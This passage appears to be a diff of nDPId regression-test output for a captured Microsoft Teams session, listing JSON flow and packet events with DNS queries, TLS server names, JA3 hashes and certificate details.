-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1806,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685240,"flow_last_seen":1587041685240,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685240,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1806,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1587041685240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685240,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOyKAbtGGzTNAAAAALAC\/\/8rVAAAAgQFtAEDAwUBAQgKMIS5UgAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1805,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685232,"flow_last_seen":1587041685232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685232,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1805,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1587041685232,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685232,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyIAbtyjZOTAAAAALAC\/\/8ViAAAAgQFtAEDAwUBAQgKMIS5SgAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1806,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685240,"flow_last_seen":1587041685240,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685240,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1806,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1587041685240,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685240,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOyKAbtGGzTNAAAAALAC\/\/8rVAAAAgQFtAEDAwUBAQgKMIS5UgAAAAAEAgAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1807,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685243,"flow_last_seen":1587041685243,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041685243,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1807,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1587041685243,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1587041685243,"pkt":"EBMx8Tl2KDc3AG3ICABFAABPU3QAAP8R5NHAqAEGwKgBAchtADUAO5eNyGMBAAABAAAAAAAAFHNreXBlZGF0YXByZGNvbG5ldTA0CGNsb3VkYXBwA25ldAAAHAAB"} 00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1807,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685243,"flow_last_seen":1587041685243,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041685243,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1808,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685248,"flow_last_seen":1587041685248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685248,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1808,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1587041685248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685248,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyLAbsws\/klAAAAALAC\/\/\/xvAAAAgQFtAEDAwUBAQgKMIS5WgAAAAAEAgAA"} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1809,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685251,"flow_last_seen":1587041685251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685251,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1809,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1587041685251,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685251,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGR4XAqAEGKH4JB+yMAbvF6IfFAAAAALAC\/\/8d8gAAAgQFtAEDAwUBAQgKMIS5XQAAAAAEAgAA"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1810,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1587041685253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685253,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0w5JAAHUGiY00ccKEwKgBBgG77IqoHlkCRhs0zoAS\/\/9MIAAAAgQFoAEDAwgBAQQC"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1811,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1587041685253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041685253,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOyKAbtGGzTOqB5ZA1AQIABs3wAA"} -00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1812,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685240,"flow_last_seen":1587041685253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1587041685253,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1808,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685248,"flow_last_seen":1587041685248,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685248,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1808,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1587041685248,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685248,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyLAbsws\/klAAAAALAC\/\/\/xvAAAAgQFtAEDAwUBAQgKMIS5WgAAAAAEAgAA"} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1809,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685251,"flow_last_seen":1587041685251,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685251,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1809,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1587041685251,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685251,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGR4XAqAEGKH4JB+yMAbvF6IfFAAAAALAC\/\/8d8gAAAgQFtAEDAwUBAQgKMIS5XQAAAAAEAgAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1810,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1587041685253,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685253,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0w5JAAHUGiY00ccKEwKgBBgG77IqoHlkCRhs0zoAS\/\/9MIAAAAgQFoAEDAwgBAQQC"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1811,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1587041685253,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041685253,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOyKAbtGGzTOqB5ZA1AQIABs3wAA"} +00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1812,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685240,"flow_last_seen":1587041685253,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1587041685253,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1813,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1587041685256,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1587041685256,"pkt":"KDc3AG3IEBMx8Tl2CABFAACb\/nFAADkRv4jAqAEBwKgBBgA1yG0AhwAAyGOBgAABAAAAAQAAFHNreXBlZGF0YXByZGNvbG5ldTA0CGNsb3VkYXBwA25ldAAAHAABwCEABgABAAAADgBABHByZDEOYXp1cmVkbnMtY2xvdWTAKgZtc25oc3QJbWljcm9zb2Z0A2NvbQB9o\/w8AAADhAAAASwACTqAAAAAPA=="} 00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1813,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041685243,"flow_last_seen":1587041685256,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041685256,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1814,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1587041685261,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685261,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0jN1AAG0Ge5k0cg8twKgBBgG77IfA1AaRAv0Ol4AS\/\/+iigAAAgQFoAEDAwgBAQQC"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1815,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1587041685261,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041685261,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGNYPAqAEGNHIPLeyHAbsC\/Q6XwNQGklAQIADDSQAA"} -00990{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1816,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685106,"flow_last_seen":1587041685262,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1587041685262,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"trouter2-asse-a.trouter.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01338{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1824,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041685240,"flow_last_seen":1587041685269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6122,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1587041685269,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","server_names":"*.config.teams.microsoft.com,config.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"7d8fd34fdb13a7fff30d5a52846b6c4c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=config.teams.microsoft.com","fingerprint":"B9:54:54:12:C9:E9:43:65:10:70:04:7B:AD:B6:0C:46:06:38:A5:FA"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1828,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1587041685278,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041685278,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8aa1AAGwGYc00ck0hwKgBBgG77IgacWa+co2TlKASIABIJQAAAgQFoAEDAwgEAggKYR7cGTCEuUo="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1829,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1587041685278,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685278,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyIAbtyjZOUGnFmv4AQEAmGrAAAAQEICjCEuXNhHtwZ"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1830,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685232,"flow_last_seen":1587041685278,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041685278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1833,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1587041685280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041685280,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8VD9AAGwGx0kofgkHwKgBBgG77IwJMzAcxeiHxqASIADLBQAAAgQFoAEDAwgEAggKUkq4VzCEuV0="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1834,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1587041685280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685280,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR5HAqAEGKH4JB+yMAbvF6IfGCTMwHYAQEAkJnwAAAQEICjCEuXRSSrhX"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1835,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685251,"flow_last_seen":1587041685281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041685281,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1841,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1587041685294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041685294,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8VA1AAGwGd200ck0hwKgBBgG77IvHJo2qMLP5JqASIAAqDQAAAgQFoAEDAwgEAggKYR8CxDCEuVo="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1842,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1587041685294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685294,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyLAbsws\/kmxyaNq4AQEAlolwAAAQEICjCEuYBhHwLE"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1843,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685248,"flow_last_seen":1587041685294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1587041685294,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1864,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041685232,"flow_last_seen":1587041685327,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041685327,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} -01503{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1874,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1587041685248,"flow_last_seen":1587041685350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6269,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1587041685350,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 